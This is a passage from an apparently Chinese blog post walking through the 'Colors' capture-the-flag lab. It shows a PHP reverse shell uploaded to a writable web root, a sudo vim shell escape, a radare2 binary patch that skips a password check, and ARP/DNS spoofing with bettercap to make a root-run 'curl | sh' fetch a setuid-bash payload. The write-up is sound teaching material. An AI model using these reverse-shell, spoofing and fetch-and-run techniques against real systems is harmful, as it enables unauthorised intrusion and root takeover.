pink@color:~$ cat \/var\/www\/html\/sh.php\ncat: \/var\/www\/html\/sh.php: No such file or directory\npink@color:~$ cd \/var\/www\/html\npink@color:\/var\/www\/html$ ls -la\ntotal 828\ndrwxrwxrwx 2 www-data www-data   4096 Feb 11  2023 .\ndrwxr-xr-x 3 root     root       4096 Jan 27  2023 ..\n-rw-r--r-- 1 www-data www-data    295 Jan 27  2023 index.html\n-rw-r--r-- 1 www-data www-data  10701 Jan 27  2023 index.html.bak\n-rw-r--r-- 1 www-data www-data 821574 Jan 27  2023 seized.png\npink@color:\/var\/www\/html$ head index.html\n<!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta charset="UTF-8">\n    <meta http-equiv="X-UA-Compatible" content="IE=edge">\n    <meta name="viewport" content="width=device-width, initial-scale=1.0">\n    <title>Document<\/title>\n<\/head>\n<body>\n    <img src=".\/seized.png" alt="">\npink@color:\/var\/www\/html$ cd ..\npink@color:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root     root     4096 Jan 27  2023 .\ndrwxr-xr-x 12 root     root     4096 Jan 27  2023 ..\ndrwxrwxrwx  2 www-data www-data 4096 Feb 11  2023 html\npink@color:\/var\/www$ cd html\npink@color:\/var\/www\/html$ vim revershell.php\npink@color:\/var\/www\/html$ head revershell.php\n\n  <?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = "1.0";\n  $ip = '192.168.0.143';  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;\npink@color:\/var\/www\/html$ curl http:\/\/0.0.0.0:80\/revershell.php<\/code><\/pre>\n
\"image-20240427141757189\"<\/div><\/p>\n
\u5207\u6362\u81f3green<\/h3>\n
(remote) www-data@color:\/$ sudo -l\nMatching Defaults entries for www-data on color:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on color:\n    (green) NOPASSWD: \/usr\/bin\/vim\n(remote) www-data@color:\/$ sudo -u green \/usr\/bin\/vim\n\n# :!\/bin\/bash\n\ngreen@color:\/$ <\/code><\/pre>\n
\u8fd9\u5c31\u662f\u5e38\u89c1\u7684\u63d0\u6743\u8fa3\uff01\uff01\uff01<\/p>\n
green@color:\/$ cd \/home\/green\/\ngreen@color:~$ ls -la\ntotal 44\ndrwx------ 2 green green  4096 Feb 11  2023 .\ndrwxr-xr-x 6 root  root   4096 Jan 27  2023 ..\nlrwxrwxrwx 1 root  root      9 Feb 11  2023 .bash_history -> \/dev\/null\n-rwx------ 1 green green   220 Jan 27  2023 .bash_logout\n-rwx------ 1 green green  3526 Jan 27  2023 .bashrc\n-rwx------ 1 green green   807 Jan 27  2023 .profile\n-rw-r--r-- 1 root  root    145 Feb 11  2023 note.txt\n-rwxr-xr-x 1 root  root  16928 Feb 11  2023 test_4_green\ngreen@color:~$ cat note.txt \nYou've been working very well lately Green, so I'm going to give you one last test. If you pass it I'll give you the password for purple.\n\n-root\ngreen@color:~$ file test_4_green \ntest_4_green: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=9496189c225509b7a26fbf1a874b3edeb9be0859, for GNU\/Linux 3.2.0, not stripped<\/code><\/pre>\n
\u5206\u6790\u7a0b\u5e8f<\/h3>\n
\u4e0b\u8f7d\u4e00\u4e0b\uff0c\u770b\u4e00\u4e0b\u6709\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ pwn checksec test_4_green\n[*] '\/home\/kali\/temp\/color\/test_4_green'\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      PIE enabled<\/code><\/pre>\n
\u4f7f\u7528radare2<\/code>\u8fdb\u884c\u67e5\u770b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ r2 test_4_green                                       \nWarning: run r2 with -e bin.cache=true to fix relocations in disassembly\n[0x000010b0]> aaa\n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Finding and parsing C++ vtables (avrr)\n[x] Type matching analysis for all functions (aaft)\n[x] Propagate noreturn information (aanr)\n[x] Use -AA or aaaa to perform additional experimental analysis.\n[0x000010b0]> apl\nCannot find prelude\n[0x000010b0]> iE\n[Exports]\n\nnth paddr      vaddr      bind   type   size lib name\n\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\n45  0x00001340 0x00001340 GLOBAL FUNC   1        __libc_csu_fini\n50  ---------- 0x00004060 GLOBAL NOTYPE 0        _edata\n51  0x00001344 0x00001344 GLOBAL FUNC   0        _fini\n55  0x00003050 0x00004050 GLOBAL NOTYPE 0        __data_start\n57  0x00003058 0x00004058 GLOBAL OBJ    0        __dso_handle\n58  0x00002000 0x00002000 GLOBAL OBJ    4        _IO_stdin_used\n60  0x000012e0 0x000012e0 GLOBAL FUNC   93       __libc_csu_init\n61  ---------- 0x00004068 GLOBAL NOTYPE 0        _end\n62  0x000010b0 0x000010b0 GLOBAL FUNC   43       _start\n63  ---------- 0x00004060 GLOBAL NOTYPE 0        __bss_start\n64  0x000011df 0x000011df GLOBAL FUNC   255      main\n65  0x00001195 0x00001195 GLOBAL FUNC   74       lucas\n67  ---------- 0x00004060 GLOBAL OBJ    0        __TMC_END__\n\n[0x000010b0]> pdf\n            ;-- section..text:\n            ;-- .text:\n            ;-- _start:\n            ;-- rip:\n\u250c 43: entry0 (int64_t arg3);\n\u2502           ; arg int64_t arg3 @ rdx\n\u2502           0x000010b0      31ed           xor ebp, ebp                ; [14] -r-x section size 657 named .text\n\u2502           0x000010b2      4989d1         mov r9, rdx                 ; arg3\n\u2502           0x000010b5      5e             pop rsi\n\u2502           0x000010b6      4889e2         mov rdx, rsp\n\u2502           0x000010b9      4883e4f0       and rsp, 0xfffffffffffffff0\n\u2502           0x000010bd      50             push rax\n\u2502           0x000010be      54             push rsp\n\u2502           0x000010bf      4c8d057a0200.  lea r8, [sym.__libc_csu_fini] ; 0x1340\n\u2502           0x000010c6      488d0d130200.  lea rcx, [sym.__libc_csu_init] ; 0x12e0 ; "AWL\\x8d=\\xff*"\n\u2502           0x000010cd      488d3d0b0100.  lea rdi, [main]             ; 0x11df\n\u2502           0x000010d4      ff15062f0000   call qword [reloc.__libc_start_main] ; [0x3fe0:8]=0\n\u2514           0x000010da      f4             hlt\n[0x000010b0]> s main\n[0x000011df]> pdf\n            ; DATA XREF from entry0 @ 0x10cd\n\u250c 255: int main (int argc, char **argv, char **envp);\n\u2502           ; var int64_t var_1d0h @ rbp-0x1d0\n\u2502           ; var int64_t var_ch @ rbp-0xc\n\u2502           ; var uint32_t var_8h @ rbp-0x8\n\u2502           ; var signed int64_t var_4h @ rbp-0x4\n\u2502           0x000011df      55             push rbp\n\u2502           0x000011e0      4889e5         mov rbp, rsp\n\u2502           0x000011e3      4881ecd00100.  sub rsp, 0x1d0\n\u2502           0x000011ea      bf00000000     mov edi, 0                  ; time_t *timer\n\u2502           0x000011ef      e87cfeffff     call sym.imp.time           ; time_t time(time_t *timer)\n\u2502           0x000011f4      89c7           mov edi, eax                ; int seed\n\u2502           0x000011f6      e865feffff     call sym.imp.srand          ; void srand(int seed)\n\u2502           0x000011fb      e890feffff     call sym.imp.rand           ; int rand(void)\n\u2502           0x00001200      4863d0         movsxd rdx, eax\n\u2502           0x00001203      4869d283de1b.  imul rdx, rdx, 0x431bde83\n\u2502           0x0000120a      48c1ea20       shr rdx, 0x20\n\u2502           0x0000120e      c1fa12         sar edx, 0x12\n\u2502           0x00001211      89c1           mov ecx, eax\n\u2502           0x00001213      c1f91f         sar ecx, 0x1f\n\u2502           0x00001216      29ca           sub edx, ecx\n\u2502           0x00001218      69ca40420f00   imul ecx, edx, 0xf4240\n\u2502           0x0000121e      29c8           sub eax, ecx\n\u2502           0x00001220      89c2           mov edx, eax\n\u2502           0x00001222      8d4201         lea eax, [rdx + 1]\n\u2502           0x00001225      8945f8         mov dword [var_8h], eax\n\u2502           0x00001228      488d3dd90d00.  lea rdi, str.Guess_the_number_im_thinking:_ ; 0x2008 ; "Guess the number im thinking: " ; const char *format\n\u2502           0x0000122f      b800000000     mov eax, 0\n\u2502           0x00001234      e817feffff     call sym.imp.printf         ; int printf(const char *format)\n\u2502           0x00001239      488d45f4       lea rax, [var_ch]\n\u2502           0x0000123d      4889c6         mov rsi, rax\n\u2502           0x00001240      488d3de00d00.  lea rdi, [0x00002027]       ; "%d" ; const char *format\n\u2502           0x00001247      b800000000     mov eax, 0\n\u2502           0x0000124c      e82ffeffff     call sym.imp.__isoc99_scanf ; int scanf(const char *format)\n\u2502           0x00001251      8b45f4         mov eax, dword [var_ch]\n\u2502           0x00001254      3945f8         cmp dword [var_8h], eax\n\u2502       \u250c\u2500< 0x00001257      7572           jne 0x12cb\n\u2502       \u2502   0x00001259      488d3dca0d00.  lea rdi, str.Correct___Here_is_the_pass: ; 0x202a ; "Correct!! Here is the pass:" ; const char *s\n\u2502       \u2502   0x00001260      e8dbfdffff     call sym.imp.puts           ; int puts(const char *s)\n\u2502       \u2502   0x00001265      488d8530feff.  lea rax, [var_1d0h]\n\u2502       \u2502   0x0000126c      488d15e50d00.  lea rdx, str.FuprpRblcTzeg5JDNNasqeWKpFHvms4rMgrpAFYj5Zngqgvl7jK0iPpViDReY6nognFSGKtS4zTEiVPgzDXnPj06WsScYlt0EFryMGvP8SjVsg9YjmxTeHkXUdzliZK8zqVCv2pZnGJ7L8e6DCsDPjNvjkVYR3WiRhf9jXCRKMGvP8SjVsg9YjmxTeHkXUdzkiZK8zqaCv2pZnGJ7L8e6DCsDPjNvjkVYR3WiRhf9jXCRKMGvP8SjVsg9YjmxTeHkXUdzkiZK8zqVCv2pZnGJ7L8e6DCsDPjNvjkVYR3WiRhf9jXCRKhaAWAR7kxJC8METsFLehuWd43P8kj2z2uyEBDD3dGEGdisWzwcSMBj6oh4R9HBDEJVr23haAWAR7kxJC8METFFLehuWd43P8kj2z2uyEBDD3dGEGdisWzwcSMBj6oh4R9HBDEJVr23 ; 0x2058 ; "FuprpRblcTzeg5JDNNasqeWKpFHvms4rMgrpAFYj5Zngqgvl7jK0iPpViDReY6nognFSGKtS4zTEiVPgzDXnPj06WsScYlt0EFryMGvP8SjVsg9YjmxTeHkXUdzliZK8zqVCv2pZnGJ7L8e6DCsDPjNvjkVYR3WiRhf9jXCRKMGvP8SjVsg9YjmxTeHkXUdzkiZK8zqaCv2pZnGJ7L8e6DCsDPjNvjkVYR3WiRhf9jXCRKMGvP8SjVsg9YjmxTeHkXUdzkiZK8zqVCv2pZnGJ7L8e6DCsDPjNvjkVYR3WiRhf9jXCRKhaAWAR7kxJC8METsFLehuWd43P8kj2z2uyEBDD3dGEGdisWzwcSMBj6oh4R9HBDEJVr23haAWAR7kxJC8METFFLehuWd43P8kj2z2uyEBDD3dGEGdisWzwcSMBj6oh4R9HBDEJVr23"\n\u2502       \u2502   0x00001273      b937000000     mov ecx, 0x37               ; '7'\n\u2502       \u2502   0x00001278      4889c7         mov rdi, rax\n\u2502       \u2502   0x0000127b      4889d6         mov rsi, rdx\n\u2502       \u2502   0x0000127e      f348a5         rep movsq qword [rdi], qword ptr [rsi]\n\u2502       \u2502   0x00001281      4889f2         mov rdx, rsi\n\u2502       \u2502   0x00001284      4889f8         mov rax, rdi\n\u2502       \u2502   0x00001287      8b0a           mov ecx, dword [rdx]\n\u2502       \u2502   0x00001289      8908           mov dword [rax], ecx\n\u2502       \u2502   0x0000128b      488d4004       lea rax, [rax + 4]\n\u2502       \u2502   0x0000128f      488d5204       lea rdx, [rdx + 4]\n\u2502       \u2502   0x00001293      0fb60a         movzx ecx, byte [rdx]\n\u2502       \u2502   0x00001296      8808           mov byte [rax], cl\n\u2502       \u2502   0x00001298      c745fc000000.  mov dword [var_4h], 0\n\u2502      \u250c\u2500\u2500< 0x0000129f      eb22           jmp 0x12c3\n\u2502      \u2502\u2502   ; CODE XREF from main @ 0x12c7\n\u2502     \u250c\u2500\u2500\u2500> 0x000012a1      8b45fc         mov eax, dword [var_4h]\n\u2502     \u254e\u2502\u2502   0x000012a4      89c7           mov edi, eax                ; uint32_t arg1\n\u2502     \u254e\u2502\u2502   0x000012a6      e8eafeffff     call sym.lucas\n\u2502     \u254e\u2502\u2502   0x000012ab      4898           cdqe\n\u2502     \u254e\u2502\u2502   0x000012ad      0fb6840530fe.  movzx eax, byte [rbp + rax - 0x1d0]\n\u2502     \u254e\u2502\u2502   0x000012b5      0fbec0         movsx eax, al\n\u2502     \u254e\u2502\u2502   0x000012b8      89c7           mov edi, eax                ; int c\n\u2502     \u254e\u2502\u2502   0x000012ba      e871fdffff     call sym.imp.putchar        ; int putchar(int c)\n\u2502     \u254e\u2502\u2502   0x000012bf      8345fc01       add dword [var_4h], 1\n\u2502     \u254e\u2502\u2502   ; CODE XREF from main @ 0x129f\n\u2502     \u254e\u2514\u2500\u2500> 0x000012c3      837dfc0c       cmp dword [var_4h], 0xc\n\u2502     \u2514\u2500\u2500\u2500< 0x000012c7      7ed8           jle 0x12a1\n\u2502      \u250c\u2500\u2500< 0x000012c9      eb0c           jmp 0x12d7\n\u2502      \u2502\u2502   ; CODE XREF from main @ 0x1257\n\u2502      \u2502\u2514\u2500> 0x000012cb      488d3d740d00.  lea rdi, str.Nope__sorry    ; 0x2046 ; "Nope, sorry" ; const char *s\n\u2502      \u2502    0x000012d2      e869fdffff     call sym.imp.puts           ; int puts(const char *s)\n\u2502      \u2502    ; CODE XREF from main @ 0x12c9\n\u2502      \u2514\u2500\u2500> 0x000012d7      b800000000     mov eax, 0\n\u2502           0x000012dc      c9             leave\n\u2514           0x000012dd      c3             ret<\/code><\/pre>\n
\u770b\u5176\u4ed6\u5e08\u5085blog\u8fd9\u91cc\u9700\u8981\u9009\u62e9\u5199\u5165\u6a21\u5f0f\uff0c\u7136\u540e\u4fee\u6539\u6c47\u7f16\u4ee3\u7801\uff1a<\/p>\n
\u6ce8\u610f\u5230<\/p>\n
0x00001257      7572           jne 0x12cb<\/code><\/pre>\n
\u610f\u601d\u662fjne 0x12cb\u662f\u4e00\u4e2a\u6761\u4ef6\u8f6c\u79fb\u6307\u4ee4<\/strong>\u3002\u5f53ZF\uff08\u96f6\u6807\u5fd7\u4f4d\uff09\u4e3a0\u65f6\uff0c\u7a0b\u5e8f\u4f1a\u8f6c\u81f30x12cb\u8fd9\u4e2a\u6807\u53f7\u5904\u6267\u884c\uff0c\u4e0e\u6b64\u76f8\u53cd\u7684\u662f je<\/code>\uff08Jump if Equal\uff09\u3002\u5f53\u96f6\u6807\u5fd7\u4f4d\uff08ZF\uff09\u88ab\u8bbe\u7f6e\uff08\u5373ZF=1\uff09\u65f6\uff0cje<\/code> \u6307\u4ee4\u4f1a\u6267\u884c\u8df3\u8f6c\u3002\u8fd9\u6837\u6211\u4eec\u5c31\u53ef\u4ee5\u8df3\u8f6c\u5230\u5bc6\u7801\u6b63\u786e\u7684\u5730\u65b9\u4e86\uff01<\/p>\n
\u4ee5\u5199\u5165\u683c\u5f0f\u6253\u5f00<\/h4>\n
r2 -w .\/test_4_green<\/code><\/pre>\n
\u6d4f\u89c8\u6a21\u5f0f<\/h4>\n
V<\/code><\/pre>\n
\u663e\u793a\u53cd\u6c47\u7f16\u6307\u4ee4<\/h4>\n
p<\/code><\/pre>\n
\"image-20240427144954098\"<\/div><\/p>\n
\u53ef\u4ee5\u770b\u5230\u8f93\u5165\u9519\u8bef\u3002\u5c31\u4f1a\u8f93\u51fa\u62a5\u9519\uff01<\/p>\n
\u4fee\u6539<\/h4>\n
\"image-20240427145031340\"<\/div><\/p>\n
shift+a<\/code><\/pre>\n
\u5199\u5165je 0x12cb<\/code><\/p>\n
\"image-20240427145131381\"<\/div><\/p>\n
\u7136\u540eEnter<\/code>\u518d\u8f93\u5165Y<\/code>\u4fdd\u5b58\u4fee\u6539\uff01<\/p>\n
\u9000\u51fa\u6267\u884c<\/h4>\n
\u5b8c\u6210\u4fee\u6539\u4ee5\u540e\uff0c\u9000\u51fa\u518d\u8f93\u5165\u4efb\u610f\u7684\u6570\u5b57\u5373\u53ef\u83b7\u5f97flag\uff01\uff08\u6b64flag\u975e\u5f7cflag\uff0c\u662f\u7a0b\u5e8f\u7684flag\uff09<\/p>\n
\u6309q<\/code>\uff0c\u518d\u8f93\u5165q<\/code>\u4ee5\u53caenter<\/code>\u9000\u51fa\uff0c\u6267\u884c\uff01<\/p>\n
[0x00001281]> q\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/color]\n\u2514\u2500# .\/test_4_green \nGuess the number im thinking: 6666\nCorrect!! Here is the pass:\npurpleaslilas<\/code><\/pre>\n
\u5207\u6362\u81f3purple<\/h3>\n
(remote) green@color:\/home\/green$ su -l purple\nPassword: \npurple@color:~$ ls -la\ntotal 32\ndrwx------ 2 purple purple 4096 Feb 20  2023 .\ndrwxr-xr-x 6 root   root   4096 Jan 27  2023 ..\nlrwxrwxrwx 1 root   root      9 Feb 11  2023 .bash_history -> \/dev\/null\n-rwx------ 1 purple purple  220 Jan 27  2023 .bash_logout\n-rwx------ 1 purple purple 3526 Jan 27  2023 .bashrc\n-rw-r--r-- 1 root   root     77 Feb 11  2023 for_purple_only.txt\n-rwx------ 1 purple purple  807 Jan 27  2023 .profile\n-rw-r--r-- 1 root   root     14 Feb 11  2023 user.txt\n-rw------- 1 purple purple  868 Feb 20  2023 .viminfo\npurple@color:~$ cat user.txt \n(:Ez_Colors:)\npurple@color:~$ sudo -l\nMatching Defaults entries for purple on color:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser purple may run the following commands on color:\n    (root) NOPASSWD: \/attack_dir\/ddos.sh\npurple@color:~$ cat \/attack_dir\/ddos.sh\n#!\/bin\/bash\n\/usr\/bin\/curl http:\/\/masterddos.hmv\/attack.sh | \/usr\/bin\/sh -p\npurple@color:~$ cat for_purple_only.txt \nAs the highest level user I allow you to use the supreme ddos attack script.<\/code><\/pre>\n
Arp\u6b3a\u9a97<\/h3>\n
\u4e4b\u524d\u7fa4\u4e3b\u63a8\u8350\u8fc7\u4e00\u4e2a\u5de5\u5177bettercap<\/code>\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u9996\u5148\u5199\u4e00\u4e2a\u63d0\u6743\u7a0b\u5e8f<\/h4>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ echo 'chmod +s \/bin\/bash' > attack.sh\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ python3 -m http.server 80  \nServing HTTP on 0.0.0.0 port 80 (http:\/\/0.0.0.0:80\/) ...\n192.168.0.162 - - [27\/Apr\/2024 03:10:53] "GET \/attack.sh HTTP\/1.1" 200 -\n^C\nKeyboard interrupt received, exiting.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ chmod +x attack.sh \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ python3 -m http.server 80\nServing HTTP on 0.0.0.0 port 80 (http:\/\/0.0.0.0:80\/) ...\n192.168.0.162 - - [27\/Apr\/2024 03:12:13] "GET \/attack.sh HTTP\/1.1" 200 -<\/code><\/pre>\n
\n
\u4e00\u5b9a\u8981\u8bb0\u5f97\u8d4b\u4e88\u6267\u884c\u6743\u9650\u55f7\uff01(\u60b2.jpg)<\/p>\n<\/blockquote>\n
\u4f7f\u7528bettercap\u5f00\u542fdns\u6b3a\u9a97\u548carp\u6b3a\u9a97<\/h4>\n
\"image-20240427151417692\"<\/div><\/p>\n
set dns.spoof.domains masterddos.hmv\nset dns.spoof.address 192.168.0.143\nset arp.spoof.targets 192.168.0.162\ndns.spoof on\narp.spoof on<\/code><\/pre>\n
\u6267\u884c\u7a0b\u5e8f\u83b7\u5f97rootshell<\/h4>\n
\u6211\u8fd9\u91cc\u5bb3\u8bd5\u63a2\u4e86\u4e00\u4e0b\uff0c\u9519\u4e86\u4e00\u6b21\uff08\u6ca1\u8bbe\u7f6e\u53ef\u6267\u884c\u7684\u540e\u679c\uff0c\u60b2\uff09<\/p>\n
purple@color:~$ curl http:\/\/masterddos.hmv\/attack.sh\nchmod +s \/bin\/bash\npurple@color:~$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\npurple@color:~$ sudo \/attack_dir\/ddos.sh\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0curl: (6) Could not resolve host: masterddos.hmv\npurple@color:~$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\npurple@color:~$ sudo \/attack_dir\/ddos.sh\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100    19  100    19    0     0    904      0 --:--:-- --:--:-- --:--:--   904\npurple@color:~$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\npurple@color:~$ bash -p\nbash-5.1# cd \/root\nbash-5.1# ls -la\ntotal 40\ndrwx------  4 root root  4096 Feb 20  2023 .\ndrwxr-xr-x 19 root root  4096 Feb 20  2023 ..\nlrwxrwxrwx  1 root root     9 Jan 31  2023 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root   571 Apr 10  2021 .bashrc\n-rw-r--r--  1 root root   161 Jul  9  2019 .profile\n-rw-r--r--  1 root root   475 Feb 11  2023 root.txt\ndrwx------  2 root root  4096 Feb 11  2023 .ssh\ndrwxr-xr-x  2 root root  4096 Feb 11  2023 .vim\n-rw-------  1 root root 11088 Feb 20  2023 .viminfo\nbash-5.1# cat root.txt \nI hope you liked it :)\n\nHere, some chocolate and the flag:\n\n(:go_play_some_minecraft:)\n\n    ___  ___  ___  ___  ___.---------------.\n  .'\\__\\'\\__\\'\\__\\'\\__\\'\\__,`   .  ____ ___ \\\n  |\\\/ __\\\/ __\\\/ __\\\/ __\\\/ _:\\   |:.  \\  \\___ \\\n   \\\\'\\__\\'\\__\\'\\__\\'\\__\\'\\_`.__|  `. \\  \\___ \\\n    \\\\\/ __\\\/ __\\\/ __\\\/ __\\\/ __:                \\\n     \\\\'\\__\\'\\__\\'\\__\\ \\__\\'\\_;-----------------`\n      \\\\\/   \\\/   \\\/   \\\/   \\\/ :                 |\n       \\|______________________;________________|\n<\/code><\/pre>\n
\u81f3\u6b64\u7ec8\u4e8e\u7ed3\u675f\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV16C4y1r7bv<\/a>  \u5f3a\u70c8\u63a8\u8350\uff01lol\uff01\uff01\uff01<\/p>\n
https:\/\/0xh3rshel.github.io\/hmv-colors\/<\/a><\/p>\n
https:\/\/0x-noname.github.io\/writeups\/hmv\/colors<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Colors Hey hacker, I've heard a lot about you and  […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,22,18],"tags":[],"class_list":["post-643","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-reverse","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/643","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=643"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/643\/revisions"}],"predecessor-version":[{"id":644,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/643\/revisions\/644"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=643"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=643"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=643"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}